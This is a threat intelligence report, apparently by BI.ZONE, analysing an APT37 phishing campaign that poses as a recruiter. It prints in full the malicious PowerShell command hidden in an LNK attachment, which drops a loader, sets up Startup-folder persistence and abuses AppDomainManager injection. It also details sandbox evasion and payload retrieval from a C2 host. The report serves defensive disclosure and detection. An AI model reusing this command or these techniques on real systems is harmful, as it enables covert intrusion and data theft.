Squid Werewolf cyber spies masquerade as recruiters

The adversaries impersonated a legitimate company, emailing fake job descriptions to employees of targeted organizations

Espionage activity clusters may pose as recruiters to distribute phishing emails, targeting key employees in organizations of interest. In December 2024, the BI.ZONE Threat Intelligence team uncovered a peculiar phishing campaign aimed at luring victims with fake job opportunities at an industrial organization. A detailed analysis revealed that the attack had been carried out by Squid Werewolf (APT37, Ricochet Chollima, ScarCruft, Reaper Group).

Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It should be noted that trademark owners are not responsible for the actions of threat actors or any resulting damages.

Key findings

• Targeted phishing emails with relevant subject lines enable attackers to promptly access data within the systems used by key personnel.
• Threat actors are increasingly shifting away from Microsoft Word documents and Microsoft Excel spreadsheets, instead focusing on archives containing executables, scripts, or shortcuts.
• Espionage clusters are opting for more sophisticated methods and tools. Therefore, using advanced threat detection solutions such as EDR is recommended to mitigate the risks.

Campaign

The attack would begin with a phishing email, which the adversaries disguised as a job offer from a United Industrial Complex HR representative.

Phishing email sent by the threat actor

The attachment comprised a password-protected file Предложение о работе.zip, with the password provided in the email. The ZIP archive included an LNK file Предложение о работе.pdf.lnk which, once opened, executed the following command:

powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk').Directory).Name+'\'+'Предложение о работе.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Предложение о работе.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](692604);$k.Seek(3001,[IO.SeekOrigin]::Begin);$k.Read($b,0,692604);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::<# mm #>WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::<# mm #>WriteAllBytes($env:temp+'\mngs Attachement.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\mngs Attachement.pdf');start ($t+'\d.exe')

This command triggered the following sequence:

• Open the file Предложение о работе.pdf.lnk to read the Base64-encoded data from the offset and decode it. The resulting data is then split by the : character and decoded again using the Base algorithm.
• Copy the file %WINDOWS%\Microsoft.NET\Framework\v0.30319\dfsvc.exe to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe to gain persistence in the system.
• Save the decoded data to the following files:
  %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe.config
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll
%TEMP%\mngs Attachement.pdf
• Open the phishing document mngs Attachement.pdf.
• Run the d.exe executable.

Base64-encoded payload in Предложение о работе.pdf.lnk

Phishing document mngs Attachement.pdf

The d.exe (dfsvc.exe, ClickOnce deployment service, is a Windows native process associated with ClickOnce, a technology used to deploy and update .NET applications) executable runs the dynamic-link library (DLL) DomainManager.dll.

The d.exe file is a .NET application. When a user runs a .NET application, the Common Language Runtime (CLR) automatically loads and analyzes its configuration file (in this case, d.exe.config).

The d.exe.config file contents:

The <runtime> section of the configuration file specifies the .NET CLR runtime settings used to load a custom AppDomainManager instead of the default one:

• <appDomainManagerType value="DomainManager.InjectedDomainManager" /> indicates the class to be used as AppDomainManager. InjectedDomainManager means that the class InjectedDomainManager will be loaded by the CLR from the namespace DomainManager.
• <appDomainManagerAssembly value="DomainManager" /> indicates the assembly (DLL) from which AppDomainManager is loaded. In our case, this is a DLL file located in the same directory as the d.exe executable.

System.AppDomainManager is a built-in .NET mechanism that enables users to intercept application launches. It allows the running of custom code at program startup, including module injection. You can learn more about this module loading technique here

DomainManager.dll is a C#-based loader that is obfuscated, likely using Obfuscar.

The loader strings are stored in a double XOR-encrypted byte array, with a character index in the array and the 0xAA key.

The entry point is in the method InitializeNewDomain of the class InjectedDomainManager.

A code example is available below (Methods starting with f_ were renamed by a BI.ZONE Threat Intelligence analyst):

The loader can perform the following operations:

1. Check internet connectivity by calling https://www.timeapi[.]io/api/time/current/zone?timeZone=Europe%2FAmsterdam. If the server response includes the “seconds” string, access is confirmed; otherwise, the Internet is unavailable.
2. Check a program’s runtime to impede sandbox execution. To do this, the loader captures the current timestamp, sleeps for 10 minutes, then updates the timestamp and calculates the time difference. If it exceeds nine minutes, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/discountcode.php and then terminates.
3. If all checks are successfully passed, the loader disables autoruns from the startup folder by setting the following registry key parameters:
   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder]:
   -dll = 0x3
-exe.config = 0x3
4. Check for the presence of %LOCALAPPDATA%\DomainManager.conf. If this file exists, the loader reads the malicious payload encrypted using AES128 CBC, decrypts it, and executes it in memory. If %LOCALAPPDATA%\DomainManager.conf does not exist, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/shoppingcart.php. The server response is decrypted using AES128 CBC. It encompasses a malicious payload, which the loader runs in memory. The server payload is saved to the file %LOCALAPPDATA%\DomainManager.conf encrypted with AES128 CBC. The payload was unavailable at the time of the research.

The attack detected by BI.ZONE Threat Intelligence closely resembles one described by the Securonix team, who attribute it to the APT37 cluster (dubbed Squid Werewolf by BI.ZONE).

The adversaries employed a similar C#-based library in the past. At the time, however, the payload was decrypted using a Caesar (shift) cipher and contained obfuscated JavaScript code. The payload comprised another loader that sent a victim’s computer name to the server, then loaded and executed a PowerShell script, incorporating the VeilShell remote access trojan.

Indicator of compromise

• 20dd93441c5e78b7adc7764c92719bed70ddb0676f707df7ea9f37d7969f4776
• 49a2ed08930ed20cbf859ca2fe3113e64f7a305c7a03cbda284fcceb781d053b
• 0601426a6da40ec9b47bab54e4ec149ba69ee58f787eea0e32d1001cab1abd04
• hwsrv-1253398.hostwindsdns[.]com

MITRE ATT&CK

Detection

The described malicious activity can be detected using the following rules from BI.ZONE EDR:

• win_suspicious_powershell_base64
• win_renamed_dfsvc_process
• win_th_create_file_in_startup_folder_via_command_interpreter

How to protect your company from such threats

Like many other clusters, Squid Werewolf employs phishing emails to infiltrate a victim’s infrastructure. These risks can be mitigated with email proteсtion solutions like BI.ZONE CESP. The service features a high-performance engine of our own design and incorporates various methods of email traffic analysis.

Building an effective cybersecurity strategy requires understanding adversaries’ methods and tools while staying alert to the latest threats. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools, as well as data from underground resources. This intelligence helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.